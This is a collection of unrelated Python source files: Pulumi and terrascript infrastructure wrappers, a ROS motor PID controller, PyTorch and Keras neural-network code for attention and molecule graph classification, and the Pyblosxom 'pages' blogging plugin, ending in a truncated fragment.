return render_template("new_password.html", form=form, email=email)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
__all__ = [
'GetNodePoolResult',
'AwaitableGetNodePoolResult',
'get_node_pool',
]
@pulumi.output_type
class GetNodePoolResult:
"""
A collection of values returned by getNodePool.
"""
def __init__(__self__, annotations=None, cluster_id=None, control_plane=None, delete_not_ready_after_secs=None, etcd=None, hostname_prefix=None, id=None, labels=None, name=None, node_taints=None, node_template_id=None, quantity=None, worker=None):
if annotations and not isinstance(annotations, dict):
raise TypeError("Expected argument 'annotations' to be a dict")
pulumi.set(__self__, "annotations", annotations)
if cluster_id and not isinstance(cluster_id, str):
raise TypeError("Expected argument 'cluster_id' to be a str")
pulumi.set(__self__, "cluster_id", cluster_id)
if control_plane and not isinstance(control_plane, bool):
raise TypeError("Expected argument 'control_plane' to be a bool")
pulumi.set(__self__, "control_plane", control_plane)
if delete_not_ready_after_secs and not isinstance(delete_not_ready_after_secs, int):
raise TypeError("Expected argument 'delete_not_ready_after_secs' to be a int")
pulumi.set(__self__, "delete_not_ready_after_secs", delete_not_ready_after_secs)
if etcd and not isinstance(etcd, bool):
raise TypeError("Expected argument 'etcd' to be a bool")
pulumi.set(__self__, "etcd", etcd)
if hostname_prefix and not isinstance(hostname_prefix, str):
raise TypeError("Expected argument 'hostname_prefix' to be a str")
pulumi.set(__self__, "hostname_prefix", hostname_prefix)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if labels and not isinstance(labels, dict):
raise TypeError("Expected argument 'labels' to be a dict")
pulumi.set(__self__, "labels", labels)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if node_taints and not isinstance(node_taints, list):
raise TypeError("Expected argument 'node_taints' to be a list")
pulumi.set(__self__, "node_taints", node_taints)
if node_template_id and not isinstance(node_template_id, str):
raise TypeError("Expected argument 'node_template_id' to be a str")
pulumi.set(__self__, "node_template_id", node_template_id)
if quantity and not isinstance(quantity, int):
raise TypeError("Expected argument 'quantity' to be a int")
pulumi.set(__self__, "quantity", quantity)
if worker and not isinstance(worker, bool):
raise TypeError("Expected argument 'worker' to be a bool")
pulumi.set(__self__, "worker", worker)
@property
@pulumi.getter
def annotations(self) -> Mapping[str, Any]:
"""
(Computed) Annotations for Node Pool object (map)
"""
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> str:
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="controlPlane")
def control_plane(self) -> bool:
"""
(Computed) RKE control plane role for created nodes (bool)
"""
return pulumi.get(self, "control_plane")
@property
@pulumi.getter(name="deleteNotReadyAfterSecs")
def delete_not_ready_after_secs(self) -> int:
"""
(Computed) Delete not ready node after secs. Default `0` (int)
"""
return pulumi.get(self, "delete_not_ready_after_secs")
@property
@pulumi.getter
def etcd(self) -> bool:
"""
(Computed) RKE etcd role for created nodes (bool)
"""
return pulumi.get(self, "etcd")
@property
@pulumi.getter(name="hostnamePrefix")
def hostname_prefix(self) -> str:
"""
(Computed) The prefix for created nodes of the Node Pool (string)
"""
return pulumi.get(self, "hostname_prefix")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def labels(self) -> Mapping[str, Any]:
"""
(Computed) Labels for Node Pool object (map)
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nodeTaints")
def node_taints(self) -> Sequence['outputs.GetNodePoolNodeTaintResult']:
"""
(Computed) Node taints (List)
"""
return pulumi.get(self, "node_taints")
@property
@pulumi.getter(name="nodeTemplateId")
def node_template_id(self) -> str:
return pulumi.get(self, "node_template_id")
@property
@pulumi.getter
def quantity(self) -> int:
"""
(Computed) The number of nodes to create on Node Pool (int)
"""
return pulumi.get(self, "quantity")
@property
@pulumi.getter
def worker(self) -> bool:
"""
(Computed) RKE role role for created nodes (bool)
"""
return pulumi.get(self, "worker")
class AwaitableGetNodePoolResult(GetNodePoolResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNodePoolResult(
annotations=self.annotations,
cluster_id=self.cluster_id,
control_plane=self.control_plane,
delete_not_ready_after_secs=self.delete_not_ready_after_secs,
etcd=self.etcd,
hostname_prefix=self.hostname_prefix,
id=self.id,
labels=self.labels,
name=self.name,
node_taints=self.node_taints,
node_template_id=self.node_template_id,
quantity=self.quantity,
worker=self.worker)
def get_node_pool(cluster_id: Optional[str] = None,
name: Optional[str] = None,
node_template_id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNodePoolResult:
"""
Use this data source to retrieve information about a Rancher v2 Node Pool resource.
## Example Usage
```python
import pulumi
import pulumi_rancher2 as rancher2
foo = rancher2.get_node_pool(cluster_id=rancher2_cluster["foo-custom"]["id"],
name="foo")
```
:param str cluster_id: The RKE cluster id to use Node Pool (string)
:param str name: The name of the Node Pool (string)
:param str node_template_id: The Node Template ID to use for node creation (string)
"""
__args__ = dict()
__args__['clusterId'] = cluster_id
__args__['name'] = name
__args__['nodeTemplateId'] = node_template_id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('rancher2:index/getNodePool:getNodePool', __args__, opts=opts, typ=GetNodePoolResult).value
return AwaitableGetNodePoolResult(
annotations=__ret__.annotations,
cluster_id=__ret__.cluster_id,
control_plane=__ret__.control_plane,
delete_not_ready_after_secs=__ret__.delete_not_ready_after_secs,
etcd=__ret__.etcd,
hostname_prefix=__ret__.hostname_prefix,
id=__ret__.id,
labels=__ret__.labels,
name=__ret__.name,
node_taints=__ret__.node_taints,
node_template_id=__ret__.node_template_id,
quantity=__ret__.quantity,
worker=__ret__.worker)
|
#!/usr/bin/env python
import rospy
import std_msgs.msg
import phidgets.msg
import geometry_msgs.msg
#####################################################
# Initialize Variables #
#####################################################
ENCODER_LEFT = 0
ENCODER_RIGHT = 0
LINEAR_VELOCITY = 0.0
ANGULAR_VELOCITY = 0.0
#####################################################
# /left_motor/encoder Callback #
#####################################################
def update_feedback_enc_left(feedback_enc):
global ENCODER_LEFT, ENCODER_LEFT_TEMP, has_updated_left
ENCODER_LEFT = feedback_enc.count_change
# self.FEEDBACK_ENC_UPDATED = True
#####################################################
# /right_motor/encoder Callback #
#####################################################
def update_feedback_enc_right(feedback_enc):
global ENCODER_RIGHT, ENCODER_RIGHT_TEMP, has_updated_right
# NOTE THE MINUS SIGN!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ENCODER_RIGHT = -feedback_enc.count_change
#####################################################
# /keyboard/vel Callback #
#####################################################
def update_feedback_keyboard_vel(feedback_enc):
global LINEAR_VELOCITY, ANGULAR_VELOCITY
LINEAR_VELOCITY = feedback_enc.linear.x
ANGULAR_VELOCITY = feedback_enc.angular.z
#####################################################
# Initialize Publisher #
#####################################################
rospy.init_node('motor_control_node', anonymous=True)
pub_LEFT_MOTOR = rospy.Publisher('/left_motor/cmd_vel', std_msgs.msg.Float32, queue_size=1)
pub_RIGHT_MOTOR = rospy.Publisher('/right_motor/cmd_vel', std_msgs.msg.Float32, queue_size=1)
rate = rospy.Rate(10)
rospy.Subscriber('/left_motor/encoder', phidgets.msg.motor_encoder, update_feedback_enc_left)
rospy.Subscriber('/right_motor/encoder', phidgets.msg.motor_encoder, update_feedback_enc_right)
rospy.Subscriber('/keyboard/vel', geometry_msgs.msg.Twist, update_feedback_keyboard_vel)
#####################################################
# Controller Function #
#####################################################
def controller():
global LINEAR_VELOCITY, ANGULAR_VELOCITY,ENCODER_LEFT, ENCODER_RIGHT
# global parameters
pi = 3.14
control_frequency = 10
ticks_per_rev = 897.96*5
# vehicle parameters
dt = 0.1
base = 0.24
wheel_radius = 0.0485
# error integral part
int_error_left = 0.0
int_error_right = 0.0
# PID parameters
Kp_left = 30.0
Kp_right = 35.0
Ki_left = 400.0
Ki_right = 400.0
Kd_left = 0
Kd_right = 0
PWM = std_msgs.msg.Float32()
while not rospy.is_shutdown():
#####################################################
# Left Wheels #
#####################################################
estimated_w = (ENCODER_LEFT * 2 * pi * control_frequency) / (ticks_per_rev)
desired_w = 0.2*0.25*(LINEAR_VELOCITY - (base / 2.0) * ANGULAR_VELOCITY) / wheel_radius
print("est,desired left", estimated_w, desired_w)
error = desired_w - estimated_w
print("Error left", error)
int_error_left = int_error_left + error * dt
PWM_LEFT = (int)(Kp_left * error + Ki_left * int_error_left)
#####################################################
# Right Wheels #
#####################################################
estimated_w = (ENCODER_RIGHT * 2 * pi * control_frequency) / (ticks_per_rev)
desired_w = 0.33*0.2*(LINEAR_VELOCITY + (base / 2.0) * ANGULAR_VELOCITY) / wheel_radius
print("est,desired right", estimated_w, desired_w)
error = desired_w - estimated_w
print("Error right", error)
int_error_right = int_error_right + error * dt
PWM_RIGHT = (int)(Kp_right * error + Ki_right * int_error_right)
print("encoder ", ENCODER_LEFT, ENCODER_RIGHT)
print("PWM", PWM_LEFT, PWM_RIGHT)
if (abs(LINEAR_VELOCITY) < 0.001 and abs(ANGULAR_VELOCITY) < 0.001):
PWM_LEFT = 0
PWM_RIGHT = 0
PWM.data = PWM_LEFT
pub_LEFT_MOTOR.publish(PWM)
PWM.data = -PWM_RIGHT
pub_RIGHT_MOTOR.publish(PWM)
rate.sleep()
#####################################################
# Main Function #
#####################################################
if __name__ == "__main__":
try:
controller()
except rospy.ROSInterruptException:
pass
|
import torch
from torch import nn
from conversion_config import Config
import torch.nn.functional as F
import math
class Attn(nn.Module):
def __init__(self,hidden_size):
super(Attn, self).__init__()
self.hidden_size = hidden_size
self.attn = nn.Linear(self.hidden_size * 2, hidden_size)
self.v = nn.Parameter(torch.rand(hidden_size))
stdv = 1. / math.sqrt(self.v.size(0))
self.v.data.normal_(mean=0, std=stdv)
def forward(self, hidden, encoder_outputs):
max_len = encoder_outputs.size(1)
this_batch_size = encoder_outputs.size(0)
H = hidden.repeat(max_len,1,1).transpose(0,1)
attn_energies = self.score(H,encoder_outputs)
return F.softmax(attn_energies).unsqueeze(1)
def score(self, hidden, encoder_outputs):
energy = F.tanh(self.attn(torch.cat([hidden, encoder_outputs], 2)))
energy = energy.transpose(2,1)
v = self.v.repeat(encoder_outputs.data.shape[0],1).unsqueeze(1)
energy = torch.bmm(v,energy)
return energy.squeeze(1)
|
# terrascript/resource/philips-software/hsdp.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:18:56 UTC)
import terrascript
class hsdp_ai_inference_compute_environment(terrascript.Resource):
pass
class hsdp_ai_inference_compute_target(terrascript.Resource):
pass
class hsdp_ai_inference_job(terrascript.Resource):
pass
class hsdp_ai_inference_model(terrascript.Resource):
pass
class hsdp_ai_workspace(terrascript.Resource):
pass
class hsdp_ai_workspace_compute_target(terrascript.Resource):
pass
class hsdp_cdl_data_type_definition(terrascript.Resource):
pass
class hsdp_cdl_export_route(terrascript.Resource):
pass
class hsdp_cdl_label_definition(terrascript.Resource):
pass
class hsdp_cdl_research_study(terrascript.Resource):
pass
class hsdp_cdr_org(terrascript.Resource):
pass
class hsdp_cdr_subscription(terrascript.Resource):
pass
class hsdp_container_host(terrascript.Resource):
pass
class hsdp_container_host_exec(terrascript.Resource):
pass
class hsdp_dicom_gateway_config(terrascript.Resource):
pass
class hsdp_dicom_object_store(terrascript.Resource):
pass
class hsdp_dicom_remote_node(terrascript.Resource):
pass
class hsdp_dicom_repository(terrascript.Resource):
pass
class hsdp_dicom_store_config(terrascript.Resource):
pass
class hsdp_edge_app(terrascript.Resource):
pass
class hsdp_edge_config(terrascript.Resource):
pass
class hsdp_edge_custom_cert(terrascript.Resource):
pass
class hsdp_edge_sync(terrascript.Resource):
pass
class hsdp_function(terrascript.Resource):
pass
class hsdp_iam_application(terrascript.Resource):
pass
class hsdp_iam_client(terrascript.Resource):
pass
class hsdp_iam_email_template(terrascript.Resource):
pass
class hsdp_iam_group(terrascript.Resource):
pass
class hsdp_iam_mfa_policy(terrascript.Resource):
pass
class hsdp_iam_org(terrascript.Resource):
pass
class hsdp_iam_password_policy(terrascript.Resource):
pass
class hsdp_iam_proposition(terrascript.Resource):
pass
class hsdp_iam_role(terrascript.Resource):
pass
class hsdp_iam_service(terrascript.Resource):
pass
class hsdp_iam_user(terrascript.Resource):
pass
class hsdp_metrics_autoscaler(terrascript.Resource):
pass
class hsdp_notification_producer(terrascript.Resource):
pass
class hsdp_notification_subscriber(terrascript.Resource):
pass
class hsdp_notification_subscription(terrascript.Resource):
pass
class hsdp_notification_topic(terrascript.Resource):
pass
class hsdp_pki_cert(terrascript.Resource):
pass
class hsdp_pki_tenant(terrascript.Resource):
pass
class hsdp_s3creds_policy(terrascript.Resource):
pass
__all__ = [
"hsdp_ai_inference_compute_environment",
"hsdp_ai_inference_compute_target",
"hsdp_ai_inference_job",
"hsdp_ai_inference_model",
"hsdp_ai_workspace",
"hsdp_ai_workspace_compute_target",
"hsdp_cdl_data_type_definition",
"hsdp_cdl_export_route",
"hsdp_cdl_label_definition",
"hsdp_cdl_research_study",
"hsdp_cdr_org",
"hsdp_cdr_subscription",
"hsdp_container_host",
"hsdp_container_host_exec",
"hsdp_dicom_gateway_config",
"hsdp_dicom_object_store",
"hsdp_dicom_remote_node",
"hsdp_dicom_repository",
"hsdp_dicom_store_config",
"hsdp_edge_app",
"hsdp_edge_config",
"hsdp_edge_custom_cert",
"hsdp_edge_sync",
"hsdp_function",
"hsdp_iam_application",
"hsdp_iam_client",
"hsdp_iam_email_template",
"hsdp_iam_group",
"hsdp_iam_mfa_policy",
"hsdp_iam_org",
"hsdp_iam_password_policy",
"hsdp_iam_proposition",
"hsdp_iam_role",
"hsdp_iam_service",
"hsdp_iam_user",
"hsdp_metrics_autoscaler",
"hsdp_notification_producer",
"hsdp_notification_subscriber",
"hsdp_notification_subscription",
"hsdp_notification_topic",
"hsdp_pki_cert",
"hsdp_pki_tenant",
"hsdp_s3creds_policy",
]
|
#######################################################################
# This file is part of Pyblosxom.
#
# Copyright (c) 2002-2011 Will Kahn-Greene
#
# Pyblosxom is distributed under the MIT license. See the file
# LICENSE for distribution details.
#######################################################################
"""
Summary
=======
Blogs don't always consist solely of blog entries. Sometimes you want
to add other content to your blog that's not a blog entry. For
example, an "about this blog" page or a page covering a list of your
development projects.
This plugin allows you to have pages served by Pyblosxom that aren't
blog entries.
Additionally, this plugin allows you to have a non-blog-entry front
page. This makes it easier to use Pyblosxom to run your entire
website.
Install
=======
This plugin comes with Pyblosxom. To install, do the following:
1. add ``Pyblosxom.plugins.pages`` to the ``load_plugins`` list in
your ``config.py`` file.
2. configure the plugin using the configuration variables below
``pagesdir``
This is the directory that holds the pages files.
For example, if you wanted your pages in
``/home/foo/blog/pages/``, then you would set it to::
py["pagesdir"] = "/home/foo/blog/pages/"
If you have ``blogdir`` defined in your ``config.py`` file which
holds your ``datadir`` and ``flavourdir`` directories, then you
could set it to::
py["pagesdir"] = os.path.join(blogdir, "pages")
``pages_trigger`` (optional)
Defaults to ``pages``.
This is the url trigger that causes the pages plugin to look for
pages.
py["pages_trigger"] = "pages"
``pages_frontpage`` (optional)
Defaults to False.
If set to True, then pages will show the ``frontpage`` page for
the front page.
This requires you to have a ``frontpage`` file in your pages
directory. The extension for this file works the same way as blog
entries. So if your blog entries end in ``.txt``, then you would
need a ``frontpage.txt`` file.
Example::
py["pages_frontpage"] = True
Usage
=====
Pages looks for urls that start with the trigger ``pages_trigger``
value as set in your ``config.py`` file. For example, if your
``pages_trigger`` was ``pages``, then it would look for urls like
this::
/pages/blah
/pages/blah.html
and pulls up the file ``blah.txt`` [1]_ which is located in the path
specified in the config file as ``pagesdir``.
If the file is not there, it kicks up a 404.
.. [1] The file ending (the ``.txt`` part) can be any file ending
that's valid for entries on your blog. For example, if you have
the textile entryparser installed, then ``.txtl`` is also a valid
file ending.
Template
========
pages formats the page using the ``pages`` template. So you need a
``pages`` template in the flavours that you want these pages to be
rendered in. I copy my ``story`` template and remove some bits.
For example, if you're using the html flavour and that is stored in
``/home/foo/blog/flavours/html.flav/``, then you could copy the
``story`` file in that directory to ``pages`` and that would become
your ``pages`` template.
Python code blocks
==================
pages handles evaluating python code blocks. Enclose python code in
``<%`` and ``%>``. The assumption is that only you can edit your
pages files, so there are no restrictions (security or otherwise).
For example::
<%
print "testing"
%>
<%
x = { "apple": 5, "banana": 6, "pear": 4 }
for mem in x.keys():
print "<li>%s - %s</li>" % (mem, x[mem])
%>
The request object is available in python code blocks. Reference it
by ``request``. Example::
<%
config = request.get_configuration()
print "your datadir is: %s" % config["datadir"]
%>
"""
__author__ = "Will Kahn-Greene"
__email__ = "willg at bluesock dot org"
__version__ = "2011-10-22"
__url__ = "http://pyblosxom.github.com/"
__description__ = (
"Allows you to include non-blog-entry files in your site and have a "
"non-blog-entry front page.")
__category__ = "content"
__license__ = "MIT"
__registrytags__ = "1.4, 1.5, core"
import os
import StringIO
import sys
import os.path
from Pyblosxom.entries.fileentry import FileEntry
from Pyblosxom import tools
from Pyblosxom.tools import pwrap_error
TRIGGER = "pages"
INIT_KEY = "pages_pages_file_initiated"
def verify_installation(req):
config = req.get_configuration()
retval = True
if not 'pagesdir' in config:
pwrap_error("'pagesdir' property is not set in the config file.")
retval = False
elif not os.path.isdir(config["pagesdir"]):
pwrap_error(
"'pagesdir' directory does not exist. %s" % config["pagesdir"])
retval = False
return retval
def cb_date_head(args):
req = args["request"]
data = req.get_data()
if INIT_KEY in data:
args["template"] = ""
return args
def cb_date_foot(args):
return cb_date_head(args)
def eval_python_blocks(req, body):
localsdict = {"request": req}
globalsdict = {}
old_stdout = sys.stdout
old_stderr = sys.stderr
try:
start = 0
while body.find("<%", start) != -1:
start = body.find("<%")
end = body.find("%>", start)
if start != -1 and end != -1:
codeblock = body[start + 2:end].lstrip()
sys.stdout = StringIO.StringIO()
sys.stderr = StringIO.StringIO()
try:
exec codeblock in localsdict, globalsdict
except Exception, e:
print "ERROR in processing: %s" % e
output = sys.stdout.getvalue() + sys.stderr.getvalue()
body = body[:start] + output + body[end + 2:]
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
return body
def is_frontpage(pyhttp, config):
if not config.get("pages_frontpage"):
return False
pathinfo = pyhttp.get("PATH_INFO", "")
if pathinfo == "/":
return True
path, ext = os.path.splitext(pathinfo)
if path == "/index" and not ext in [".rss20", ".atom", ".rss"]:
return True
return False
def is_trigger(pyhttp, config):
trigger = config.get("pages_trigger", TRIGGER)
if not trigger.startswith("/"):
trigger = "/" + trigger
return pyhttp["PATH_INFO"].startswith(trigger)
def cb_filelist(args):
req = args["request"]
pyhttp = req.get_http()
data = req.get_data()
config = req.get_configuration()
page_name = None
if not (is_trigger(pyhttp, config) or is_frontpage(pyhttp, config)):
return
data[INIT_KEY] = 1
datadir = config["datadir"]
data['root_datadir'] = config['datadir']
pagesdir = config["pagesdir"]
pagesdir = pagesdir.replace("/", os.sep)
if not pagesdir[-1] == os.sep:
pagesdir = pagesdir + os.sep
pathinfo = pyhttp.get("PATH_INFO", "")
path, ext = os.path.splitext(pathinfo)
if pathinfo == "/" or path == "/index":
page_name = "frontpage"
else:
page_name = pyhttp["PATH_INFO"][len("/" + TRIGGER) + 1:]
if not page_name:
return
# FIXME - need to do a better job of sanitizing
page_name = page_name.replace(os.sep, "/")
if not page_name:
return
if page_name[-1] == os.sep:
page_name = page_name[:-1]
if page_name.find("/") > 0:
page_name = page_name[page_name.rfind("/"):]
# if the page has a flavour, we use that. otherwise
# we default to the default flavour.
page_name, flavour = os.path.splitext(page_name)
if flavour:
data["flavour"] = flavour[1:]
ext = tools.what_ext(data["extensions"].keys(), pagesdir + page_name)
if not ext:
return []
data['root_datadir'] = page_name + '.' + ext
data['bl_type'] = 'file'
filename = pagesdir + page_name + "." + ext
if not os.path.isfile(filename):
return []
fe = FileEntry(req, filename, pagesdir)
# now we evaluate python code blocks
body = fe.get_data()
body = eval_python_blocks(req, body)
body = ("<!-- PAGES PAGE START -->\n\n" +
body +
"<!-- PAGES PAGE END -->\n")
fe.set_data(body)
fe["absolute_path"] = TRIGGER
fe["fn"] = page_name
fe["file_path"] = TRIGGER + "/" + page_name
fe["template_name"] = "pages"
data['blog_title_with_path'] = (
config.get("blog_title", "") + " : " + fe.get("title", ""))
# set the datadir back
config["datadir"] = datadir
return [fe]
|
import os
import time
import pickle
import numpy as np
import scipy.sparse as sp
import matplotlib.pyplot as plt
from keras import metrics
from keras import backend as K
from keras.models import Model
from keras.layers import (Input, Dense, Softmax, Lambda)
from keras.optimizers import Adagrad
from keras.initializers import RandomNormal
from rdkit.Chem import MolFromSmiles
from deepchem.feat import WeaveFeaturizer, ConvMolFeaturizer
from deepchem.splits import RandomSplitter, ScaffoldSplitter
from chainer_chemistry.dataset.parsers.csv_file_parser import CSVFileParser
from chainer_chemistry.dataset.preprocessors.nfp_preprocessor import NFPPreprocessor
from sklearn.metrics import (accuracy_score, precision_score, roc_auc_score,
recall_score, auc, average_precision_score,
roc_curve, precision_recall_curve)
def load_data(csv_fp, labels_col="p_np", smiles_col="smiles"):
"""
Load BBBP data
"""
csvparser = CSVFileParser(NFPPreprocessor(), labels = labels_col, smiles_col = smiles_col)
data_ = csvparser.parse(csv_fp,return_smiles = True)
atoms, adjs, labels = data_['dataset'].get_datasets()
smiles = data_['smiles']
return {"atoms": atoms,
"adjs": adjs,
"labels":labels,
"smiles": smiles}
def normalize_adj(adj, symmetric=True):
if symmetric:
d = sp.diags(np.power(np.array(adj.sum(1)), -0.5).flatten(), 0)
a_norm = adj.dot(d).transpose().dot(d).tocsr()
else:
d = sp.diags(np.power(np.array(adj.sum(1)), -1).flatten(), 0)
a_norm = d.dot(adj).tocsr()
return a_norm
def preprocess_adj(adj, symmetric=True):
adj = sp.csr_matrix(adj)
adj = adj + sp.eye(adj.shape[0])
adj = normalize_adj(adj, symmetric)
return adj.toarray()
def preprocess(raw_data, feats="convmol"):
"""
Preprocess molecule data
"""
labels = raw_data['labels']
smiles = raw_data['smiles']
adjs = raw_data['adjs']
num_classes = np.unique(labels).shape[0]
#One hot labels
labels_one_hot = np.eye(num_classes)[labels.reshape(-1)]
if feats == "weave":
featurizer = WeaveFeaturizer()
elif feats == "convmol":
featurizer = ConvMolFeaturizer()
mol_objs = featurizer.featurize([MolFromSmiles(smile) for smile in smiles])
#Sort feature matrices by node degree
node_features = []
for i,feat in enumerate(mol_objs):
sortind = np.argsort(adjs[i].sum(axis = 1) - 1)
N = len(sortind)
sortMatrix = np.eye(N)[sortind,:]
node_features.append(np.matmul(sortMatrix.T, feat.get_atom_features()))
#Normalize Adjacency Mats
norm_adjs = [preprocess_adj(A) for A in adjs]
return {'labels_one_hot': labels_one_hot,
'node_features': node_features,
'norm_adjs': norm_adjs}
def dense(n_hidden, activation='relu',
init_stddev=0.1, init_mean=0.0,
seed=None):
"""
Helper function for configuring `keras.layers.Dense`
"""
kernel_initializer = RandomNormal(mean=init_mean, stddev=init_stddev, seed=seed)
bias_initializer = RandomNormal(mean=init_mean, stddev=init_stddev, seed=seed)
return Dense(n_hidden, activation=activation,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
use_bias=True)
def matmul(XY):
"""
Matrix multiplication for use with `keras.layers.Lambda`
Compatible with `keras.models.Model`
"""
X,Y = XY
return K.tf.matmul(X,Y)
def GAP(X):
return K.tf.reduce_mean(X, axis=1, keepdims=True)
def keras_gcn(config):
"""
Keras GCN for graph classification
We must "fool" `keras.model.Model` into accepting
inputs tensors (adjacency matrix, node features)
of different shape in the first axis than target tensors.
Otherwise, e.g.
```
ValueError: Input arrays should have the same number of samples
as target arrays. Found 20 input samples and 1 target samples.
```
Additionally, to write a matrix multiplication layer compatible with
`keras.model.Models` we must use `keras.layers.Lambda`
"""
d = config['d']
init_stddev = config['init_stddev']
L1 = config['L1']
L2 = config['L2']
L3 = config['L3']
N = config['N']
num_classes = config['num_classes']
batch_size = config['batch_size']
assert batch_size == 1, "Batch size != 1 Not Implemented!"
A_batch = Input(shape=(batch_size,N,N), batch_shape=(batch_size,N,N))
X_batch = Input(shape=(batch_size,N,d), batch_shape=(batch_size,N,d))
Y = Input(shape=(batch_size, num_classes), batch_shape=(batch_size, num_classes))
h1 = dense(L1)(Lambda(matmul)([A_batch, X_batch]))
h2 = dense(L2)(Lambda(matmul)([A_batch, h1]))
h3 = dense(L3)(Lambda(matmul)([A_batch, h2]))
gap = Lambda(GAP)(h3)
gap= Lambda(lambda y: K.squeeze(y, 1))(gap)
logits = dense(num_classes, activation='linear')(gap)
Y_hat = Softmax()(logits)
model = Model(inputs=[A_batch, X_batch], outputs=Y_hat)
model.compile(optimizer='adam',
loss=lambda y_true,y_pred: K.mean(K.binary_crossentropy(
y_true, logits, from_logits=True), axis=-1))
#loss='binary_crossentropy')
return model
def gcn_train(model, data, num_epochs, train_inds):
norm_adjs = data['norm_adjs']
labels_one_hot = data['labels_one_hot']
labels=np.argmax(labels_one_hot,axis=1)
negind=np.argwhere(labels==0).squeeze()
posind=np.argwhere(labels==1).squeeze()
Nepoch=min(len(negind),len(posind))
node_features = data['node_features']
total_loss = []
for epoch in range(num_epochs):
epoch_loss = []
epoch_correct = []
#Train
rand_inds = np.random.permutation(np.concatenate((np.random.permutation(negind)[:Nepoch],np.random.permutation(posind)[:Nepoch])))
for ri in rand_inds:
A_arr = norm_adjs[ri][np.newaxis, :, :]
X_arr = node_features[ri][np.newaxis, :, :]
Y_arr = labels_one_hot[ri][np.newaxis, :]
sample_loss = model.train_on_batch(x=[A_arr, X_arr], y=Y_arr, )
epoch_loss.append(sample_loss)
#Eval
for ri in rand_inds:
A_arr = norm_adjs[ri][np.newaxis, :, :]
X_arr = node_features[ri][np.newaxis, :, :]
Y_arr = labels_one_hot[ri][np.newaxis, :]
sample_pred = model.predict([A_arr, X_arr])
sample_correct = np.argmax(sample_pred) == np.argmax(Y_arr)
epoch_correct.append(sample_correct)
mean_epoch_loss = sum(epoch_loss) / len(epoch_loss)
epoch_acc = sum(epoch_correct) / len(epoch_correct)
print("Epoch: {}, Mean Loss: {:.3f}, Accuracy: {:.3f}".format(epoch, mean_epoch_loss, epoch_acc))
total_loss.extend(epoch_loss)
last_epoch_acc = epoch_acc
return total_loss, last_epoch_acc
class MockDataset:
"""Mock Dataset class for a DeepChem Dataset"""
def __init__(self, smiles):
self.ids = smiles
def __len__(self):
return len(self.ids)
def partition_train_val_test(smiles, dataset):
"""
Split a molecule dataset (SMILES) with deepchem built-ins
"""
ds = MockDataset(smiles)
if dataset == "BBBP":
splitter = ScaffoldSplitter()
elif dataset == "BACE":
splitter = ScaffoldSplitter()
elif dataset == "TOX21":
splitter = RandomSplitter()
train_inds, val_inds, test_inds = splitter.split(ds)
return {"train_inds": train_inds,
"val_inds": val_inds,
"test_inds": test_inds}
def run_train(config, data, inds):
"""
Sets splitter. Partitions train/val/test.
Loads model from config. Trains and evals.
Returns model and eval metrics.
"""
train_inds = inds["train_inds"]
val_inds = inds["val_inds"]
test_inds = inds["test_inds"]
model = keras_gcn(config)
loss, accuracy = gcn_train(model, data, config['num_epochs'], train_inds)
train_eval = evaluate(model, data, train_inds)
test_eval = evaluate(model, data, test_inds)
val_eval = evaluate(model, data, val_inds)
return model, {"train": train_eval,
"test": test_eval,
"val": val_eval}
def print_evals(eval_dict):
print("Accuracy: {0:.3f}".format(eval_dict["accuracy"]))
print("Precision: {0:.3f}".format(eval_dict["precision"]))
print("AUC ROC: {0:.3f}".format(eval_dict["roc_auc"]))
print("AUC PR: {0:.3f}".format(eval_dict["avg_precision"]))
print("eval time (s): {0:.3f}".format(eval_dict["eval_time"]))
def evaluate(model, data, inds, thresh=0.5):
t_test = time.time()
preds = np.concatenate([model.predict([data["norm_adjs"][i][np.newaxis, :, :],
data["node_features"][i][np.newaxis, :, :]])
for i in inds], axis=0)
preds = preds[:,1]
labels = np.array([np.argmax(data["labels_one_hot"][i]) for i in inds])
roc_auc = roc_auc_score(labels, preds)
roc_curve_ = roc_curve(labels, preds)
precision = precision_score(labels, (preds > thresh).astype('int'))
acc = accuracy_score(labels, (preds > thresh).astype('int'))
ap = average_precision_score(labels, preds)
pr_curve_ = precision_recall_curve(labels, preds)
return {"accuracy": acc,
"roc_auc": roc_auc,
"precision": precision,
"avg_precision": precision,
"eval_time": (time.time() - t_test),
"roc_curve": roc_curve_,
"pr_curve": pr_curve_}
def print_eval_avg(eval_dict, split, metric):
N = len(eval_dict.keys())
vals = [eval_dict[i][split][metric] for i in range(N)]
return "{0:.3f} +/- {1:.3f}".format(np.mean(vals), np.std(vals))
def occlude_and_predict(X_arr, A_arr, masks, thresh, model):
"""
COPIES and mutates input data
Returns predicted CLASS (not prob.) of occluded data
"""
#Copy node features. We need to edit it.
X_arr_occ = X_arr.copy()
#Occlude activated nodes for each explain method
#NB: array shape is (batch, N, D)
# and batches are always of size 1
X_arr_occ[0, masks > thresh, :] = 0
#Predict on occluded image. Save prediction
prob_occ = model.predict_on_batch(x=[A_arr, X_arr_occ])
y_hat_occ = prob_occ.argmax()
return y_hat_occ
|
import numpy as np
import copy
from supervised.algorithms.registry import AlgorithmsRegistry
from supervised.algorithms.registry import BINARY_CLASSIFICATION
class HillClimbing:
"""
Example params are in JSON format:
{
"booster": ["gbtree", "gblinear"],
"objective": ["binary:logistic"],
